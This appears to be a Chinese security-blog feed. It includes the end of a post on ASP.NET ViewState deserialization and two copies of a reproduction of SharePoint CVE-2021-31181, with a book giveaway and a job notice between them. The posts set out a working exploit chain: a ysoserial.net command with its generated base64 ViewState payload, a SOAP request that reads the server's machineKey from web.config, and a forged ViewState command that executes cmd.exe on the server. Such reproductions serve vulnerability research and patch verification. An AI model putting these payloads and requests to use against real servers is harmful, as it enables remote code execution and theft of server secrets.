区别在于禁用ViewState之后ViewState只是变短了而已，但是这个字段仍然存在，所以viewstate仍会被IIS被动解析。

Page类有一个RequestViewStateString属性

image.png

从request中拿到__VIEWSTATE

image.png

在System.Web.dll!System.Web.UI.HiddenFieldPageStatePersister.Load()中获取__VIEWSTATE，交给objectstateformatter进行反序列化。所以请求中只要有__VIEWSTATE就会反序列化。

到这里我们清楚了，iis默认被动解析viewstate，如果禁用mac并且没有启用加密可以直接rce。但是实际环境都是默认启用mac校验，并且一般会启用加密，所以接下来看一下启用加密的viewstate怎么利用。

启用加密的利用

启用加密需要配置machineKey字段，page中ViewStateEncryptionMode="Always"时会自动生成machineKey。

微软文档中^[2]提到在web.config中可以配置如下来自动生成machineKey。web.config中默认就是这个，效果等同于不写。

<machineKey   validationKey="AutoGenerate,IsolateApps"   decryptionKey="AutoGenerate,IsolateApps"   validation="AES"   decryption="Auto" />

viewstate用于身份验证的情况下，每次都会根据machineKey的配置来加密解密。而每台机器生成的key都不一样，所以在大型应用比如sharepoint中会进行手动配置machineKey。而手动配置如果我们拿到了machineKey的值，就可以对其利用。

一个手动配置的例子如下

<machineKey validationKey="70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0" decryptionKey="34C69D15ADD80DA4788E6E3D02694230CF8E9ADFDA2708EF43CAEF4C5BC73887" validation="SHA1" decryption="AES"  />

用ysoserial.net生成

PS E:\code\ysoserial.net\ysoserial\bin\Debug> .\ysoserial.exe -p viewstate -g TextFormattingRunProperties -c "ping localhost -t" --validationkey=70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0 --validationalg=SHA1 --islegacy
/wEyngcAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAADABTw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9InV0Zi0xNiI/Pg0KPE9iamVjdERhdGFQcm92aWRlciBNZXRob2ROYW1lPSJTdGFydCIgSXNJbml0aWFsTG9hZEVuYWJsZWQ9IkZhbHNlIiB4bWxucz0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwvcHJlc2VudGF0aW9uIiB4bWxuczpzZD0iY2xyLW5hbWVzcGFjZTpTeXN0ZW0uRGlhZ25vc3RpY3M7YXNzZW1ibHk9U3lzdGVtIiB4bWxuczp4PSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbCI+DQogIDxPYmplY3REYXRhUHJvdmlkZXIuT2JqZWN0SW5zdGFuY2U+DQogICAgPHNkOlByb2Nlc3M+DQogICAgICA8c2Q6UHJvY2Vzcy5TdGFydEluZm8+DQogICAgICAgIDxzZDpQcm9jZXNzU3RhcnRJbmZvIEFyZ3VtZW50cz0iL2MgcGluZyBsb2NhbGhvc3QgLXQiIFN0YW5kYXJkRXJyb3JFbmNvZGluZz0ie3g6TnVsbH0iIFN0YW5kYXJkT3V0cHV0RW5jb2Rpbmc9Int4Ok51bGx9IiBVc2VyTmFtZT0iIiBQYXNzd29yZD0ie3g6TnVsbH0iIERvbWFpbj0iIiBMb2FkVXNlclByb2ZpbGU9IkZhbHNlIiBGaWxlTmFtZT0iY21kIiAvPg0KICAgICAgPC9zZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICA8L3NkOlByb2Nlc3M+DQogIDwvT2JqZWN0RGF0YVByb3ZpZGVyLk9iamVjdEluc3RhbmNlPg0KPC9PYmplY3REYXRhUHJvdmlkZXI+C+yvvPy4DNhXXbZoH56OR6lLdT4o

将IIS的应用程序池设置为.net4.5，不然会报错找不到TextFormattingRunProperties的依赖

image.png

这边报错强制类型转换错误

image.png

实际上是已经执行了cmd的

image.png

__VIEWSTATEGENERATOR字段

大腿师傅问我VIEWSTATEGENERATOR字段对上的话，machineKey是不是一样。以及__VIEWSTATEGENERATOR是不是根据path和apppath生成的。

在objectstateformatter的反序列化方法中，启用加密会进入GetDecodedData解密viewstate

image.png

其参数有一个GetMacKeyModifier()方法的返回值

image.png

它返回一个字节数组，其中GetClientStateIdentifier来用TemplateSourceDirectory和classname计算hashcode

image.png

接着判断viewStateUserKey是否为空，如果不为空就使用_page.ViewStateUserKey，为空就用GetClientStateIdentifier()生成的。

也能用VIEWSTATEGENERATOR字段，因为VIEWSTATEGENERATOR字段就是用GetClientStateIdentifier计算的。

image.png

回到大腿师傅的问题，我个人结论是__VIEWSTATEGENERATOR和machineKey没有关系。

本地实验两个不同的machineKey，__VIEWSTATEGENERATOR一致

image.png

而当machineKey相同，文件名和类名不同时，__VIEWSTATEGENERATOR不一致

image.png

原因就是GetClientStateIdentifier生成__VIEWSTATEGENERATOR是依据TemplateSourceDirectory和classname，而并非machineKey。

另外ysoserial.net中viewstate插件有apppath和path参数，这两个参数就是用来计算VIEWSTATEGENERATOR的值，如果页面源代码里没有VIEWSTATEGENERATOR，可以使用这两个参数来计算。

赠书环节

推荐语：

（1）系统全面，讲述企业信息安全建设从0到1的全部过程。本书聚焦安全体系如何落地，从安全体系规划、方案设计、产品选型、产品开发、部署实施、日常运维等维度详细阐释，内容覆盖办公安全、IDC安全、产品安全、数据安全、安全管理、安全自动化系统开发和业务安全体系建设，基本满足大多数中小企业的安全建设需求。

（2）结合作者实践经验，可操作性强。笔者有十多年信息安全从业经验，曾任职于国内知名网络安全厂商，为数十家企业和各类单位提供安全咨询和专业服务，熟悉企业的安全需求和痛点，本书将作者的实际工作经验总结为案例，具体实用。

（3）分析具体，深入浅出，易于理解。本书从与日常的生活与工作息息相关的安全问题着手，由浅入深循序渐进，讲解信息安全建设过程中的注意事项，便于读者理解安全架构的原理，进而使安全系统建设更加完备。

哇！小编也好想来一本，快点击下方抽奖吧！（转发朋友圈，开奖前取消作废）

参考

1.https://www.cnblogs.com/edisonchou/p/3901559.html2.https://paper.seebug.org/1386/3.https://github.com/0xacb/viewgen

References

[1] ViewStateDecoder: https://github.com/raise-isayan/ViewStateDecoder/tree/master/release
[2] 微软文档中: https://docs.microsoft.com/en-us/previous-versions/msp-n-p/ff649308(v=pandp.10)?redirectedfrom=MSDN

阅读原文

跳转微信打开

SharePoint CVE-2021-31181 复现

Tue, 08 Jun 2021 08:48:00 +0800

Y4er 2021-06-08 08:48

复现需要一个用户，我这使用的是域管理员账号+SharePoint2016先要创建team site，在sp2

复现

需要一个用户，我这使用的是域管理员账号+SharePoint2016

先要创建team site，在sp2016里是创建网站集，我创建一个名为ts的网站集

http://sharepoint:8080/_admin/createsite.aspx

image.png

然后看poc的xml中

<%@ Register TagPrefix="WebPartPages" Namespace="Microsoft.SharePoint.WebPartPage" Assembly="Microsoft.SharePoint, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %> <%@Register TagPrefix="att" Namespace="System.Web.UI.WebControls " Assembly="System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"%> <WebPartPages:XsltListFormWebPart id="id01" runat="server" ListDisplayName="Documents" WebId="{6e7040c8-0338-4448-914d-a7061e0fc347}">   <DataSources>     <att:xmldatasource runat="server" id="XDS1"       XPath="/configuration/system.web/machineKey"       datafile="c:/inetpub/wwwroot/wss/VirtualDirectories/80/web.config" />   DataSources>   <xsl>       <xsl:stylesheet version="2.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">                    <xsl:output method="xml" indent="yes"/>           <xsl:template match="/" >           <xsl:copy-of select="."/>           xsl:template>       xsl:stylesheet>   xsl> WebPartPages:XsltListFormWebPart>

需要三个参数

1.ListDisplayName2.WebId3.datafile

WebId来自 http://sharepoint/sites/ts/_api/web/id

image.png

e89c64e5-75ce-4bd4-8181-2298228fc91f

ListDisplayName可以新建一个

image.png

然后ListDisplayName为test

第三个参数datafile是要读取的web.config文件，这个c:/inetpub/wwwroot/wss/VirtualDirectories/80/web.config中80对应的端口号，但是有的情况特殊可以试试C:\inetpub\wwwroot\web.config

比如我搭建的sp，8080管理端口对应的是38040

image.png

然后读web.config，构造的xml

<%@ Register TagPrefix="WebPartPages" Namespace="Microsoft.SharePoint.WebPartPage" Assembly="Microsoft.SharePoint, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %> <%@Register TagPrefix="att" Namespace="System.Web.UI.WebControls " Assembly="System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"%> <WebPartPages:XsltListFormWebPart id="id01" runat="server" ListDisplayName="test" WebId="{e89c64e5-75ce-4bd4-8181-2298228fc91f}">   <DataSources>     <att:xmldatasource runat="server" id="XDS1"       XPath="/configuration/system.web/machineKey"       datafile="c:/inetpub/wwwroot/wss/VirtualDirectories/38040/web.config" />   DataSources>   <xsl>       <xsl:stylesheet version="2.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">                    <xsl:output method="xml" indent="yes"/>           <xsl:template match="/" >           <xsl:copy-of select="."/>           xsl:template>       xsl:stylesheet>   xsl> WebPartPages:XsltListFormWebPart>

html编码之后http请求

POST /sites/ts/_vti_bin/WebPartPages.asmx HTTP/1.1Host: sharepointContent-Type: text/xml; charset=utf-8Content-Length: 6527SOAPAction: "http://microsoft.com/sharepoint/webpartpages/RenderWebPartForEdit"
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">  <soap:Body>    <RenderWebPartForEdit xmlns="http://microsoft.com/sharepoint/webpartpages">      <webPartXml><%@ Register TagPrefix="WebPartPages" Namespace="Microsoft.SharePoint.WebPartPage" Assembly="Microsoft.SharePoint, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %> <%@Register TagPrefix="att" Namespace="System.Web.UI.WebControls " Assembly="System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"%> <WebPartPages:XsltListFormWebPart id="id01" runat="server" ListDisplayName="test" WebId="{e89c64e5-75ce-4bd4-8181-2298228fc91f}">   <DataSources>     <att:xmldatasource runat="server" id="XDS1"       XPath="/configuration/system.web/machineKey"       datafile="c:/inetpub/wwwroot/wss/VirtualDirectories/38040/web.config" />   DataSources>   <xsl>       <xsl:stylesheet version="2.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">                    <xsl:output method="xml" indent="yes"/>           <xsl:template match="/" >           <xsl:copy-of select="."/>           xsl:template>       xsl:stylesheet>   xsl> WebPartPages:XsltListFormWebPart>webPartXml>    RenderWebPartForEdit>  soap:Body>soap:Envelope>

image.png

拿到validationKey E8184ADCEE3E6FD39E35B44AC344F88C2581F9F022BF7661F223DBD4EB3F9316

然后ysoserial构造viewstate，查看源代码 http://sharepoint/sites/ts/_layouts/15/success.aspx 拿到 __VIEWSTATEGENERATOR AF878507

image.png

命令

.\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "cmd.exe /c calc" --generator="AF878507" --validationkey="E8184ADCEE3E6FD39E35B44AC344F88C2581F9F022BF7661F223DBD4EB3F9316" --validationalg="HMACSHA256" --islegacy --minify

发包就RCE了

但是我这边用c:/inetpub/wwwroot/wss/VirtualDirectories/38040/web.config不行，用c:/inetpub/wwwroot/web.config 就可以了。

image.png

参考

https://www.zerodayinitiative.com/blog/2021/6/1/cve-2021-31181-microsoft-sharepoint-webpart-interpretation-conflict-remote-code-execution-vulnerability

分享、点赞、在看就是对我们的一种支持！

阅读原文

跳转微信打开

SharePoint CVE-2021-31181 复现

Fri, 04 Jun 2021 22:04:00 +0800

Y4er 2021-06-04 22:04

复现需要一个用户，我这使用的是域管理员账号+SharePoint2016先要创建team site，在sp2

复现

需要一个用户，我这使用的是域管理员账号+SharePoint2016

先要创建team site，在sp2016里是创建网站集，我创建一个名为ts的网站集

http://sharepoint:8080/_admin/createsite.aspx

image.png

然后看poc的xml中

<%@ Register TagPrefix="WebPartPages" Namespace="Microsoft.SharePoint.WebPartPage" Assembly="Microsoft.SharePoint, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %> <%@Register TagPrefix="att" Namespace="System.Web.UI.WebControls " Assembly="System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"%> <WebPartPages:XsltListFormWebPart id="id01" runat="server" ListDisplayName="Documents" WebId="{6e7040c8-0338-4448-914d-a7061e0fc347}">   <DataSources>     <att:xmldatasource runat="server" id="XDS1"       XPath="/configuration/system.web/machineKey"       datafile="c:/inetpub/wwwroot/wss/VirtualDirectories/80/web.config" />   DataSources>   <xsl>       <xsl:stylesheet version="2.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">                    <xsl:output method="xml" indent="yes"/>           <xsl:template match="/" >           <xsl:copy-of select="."/>           xsl:template>       xsl:stylesheet>   xsl> WebPartPages:XsltListFormWebPart>

需要三个参数

1.ListDisplayName2.WebId3.datafile

WebId来自 http://sharepoint/sites/ts/_api/web/id

image.png

e89c64e5-75ce-4bd4-8181-2298228fc91f

ListDisplayName可以新建一个

image.png

然后ListDisplayName为test

比如我搭建的sp，8080管理端口对应的是38040

image.png

然后读web.config，构造的xml

<%@ Register TagPrefix="WebPartPages" Namespace="Microsoft.SharePoint.WebPartPage" Assembly="Microsoft.SharePoint, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %> <%@Register TagPrefix="att" Namespace="System.Web.UI.WebControls " Assembly="System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"%> <WebPartPages:XsltListFormWebPart id="id01" runat="server" ListDisplayName="test" WebId="{e89c64e5-75ce-4bd4-8181-2298228fc91f}">   <DataSources>     <att:xmldatasource runat="server" id="XDS1"       XPath="/configuration/system.web/machineKey"       datafile="c:/inetpub/wwwroot/wss/VirtualDirectories/38040/web.config" />   DataSources>   <xsl>       <xsl:stylesheet version="2.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">                    <xsl:output method="xml" indent="yes"/>           <xsl:template match="/" >           <xsl:copy-of select="."/>           xsl:template>       xsl:stylesheet>   xsl> WebPartPages:XsltListFormWebPart>

html编码之后http请求

POST /sites/ts/_vti_bin/WebPartPages.asmx HTTP/1.1Host: sharepointContent-Type: text/xml; charset=utf-8Content-Length: 6527SOAPAction: "http://microsoft.com/sharepoint/webpartpages/RenderWebPartForEdit"
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">  <soap:Body>    <RenderWebPartForEdit xmlns="http://microsoft.com/sharepoint/webpartpages">      <webPartXml><%@ Register TagPrefix="WebPartPages" Namespace="Microsoft.SharePoint.WebPartPage" Assembly="Microsoft.SharePoint, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %> <%@Register TagPrefix="att" Namespace="System.Web.UI.WebControls " Assembly="System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"%> <WebPartPages:XsltListFormWebPart id="id01" runat="server" ListDisplayName="test" WebId="{e89c64e5-75ce-4bd4-8181-2298228fc91f}">   <DataSources>     <att:xmldatasource runat="server" id="XDS1"       XPath="/configuration/system.web/machineKey"       datafile="c:/inetpub/wwwroot/wss/VirtualDirectories/38040/web.config" />   DataSources>   <xsl>       <xsl:stylesheet version="2.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">                    <xsl:output method="xml" indent="yes"/>           <xsl:template match="/" >           <xsl:copy-of select="."/>           xsl:template>       xsl:stylesheet>   xsl> WebPartPages:XsltListFormWebPart>webPartXml>    RenderWebPartForEdit>  soap:Body>soap:Envelope>

image.png

拿到validationKey E8184ADCEE3E6FD39E35B44AC344F88C2581F9F022BF7661F223DBD4EB3F9316

然后ysoserial构造viewstate，查看源代码 http://sharepoint/sites/ts/_layouts/15/success.aspx 拿到 __VIEWSTATEGENERATOR AF878507

image.png

命令

.\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "cmd.exe /c calc" --generator="AF878507" --validationkey="E8184ADCEE3E6FD39E35B44AC344F88C2581F9F022BF7661F223DBD4EB3F9316" --validationalg="HMACSHA256" --islegacy --minify

发包就RCE了

但是我这边用c:/inetpub/wwwroot/wss/VirtualDirectories/38040/web.config不行，用c:/inetpub/wwwroot/web.config 就可以了。

image.png

参考

https://www.zerodayinitiative.com/blog/2021/6/1/cve-2021-31181-microsoft-sharepoint-webpart-interpretation-conflict-remote-code-execution-vulnerability

分享、点赞、在看就是对我们的一种支持！

阅读原文

跳转微信打开

聚天下英才,招贤良能士

Wed, 02 Jun 2021 17:42:00 +0800

CHABUG运营小哥哥 2021-06-02 17:42

帮好哥哥转发个招聘（非常好的团队哟😀，速度联系⬇）

帮好哥哥转发个招聘

（非常好的团队哟😀，速度联系⬇）

阅读原文

跳转微信打开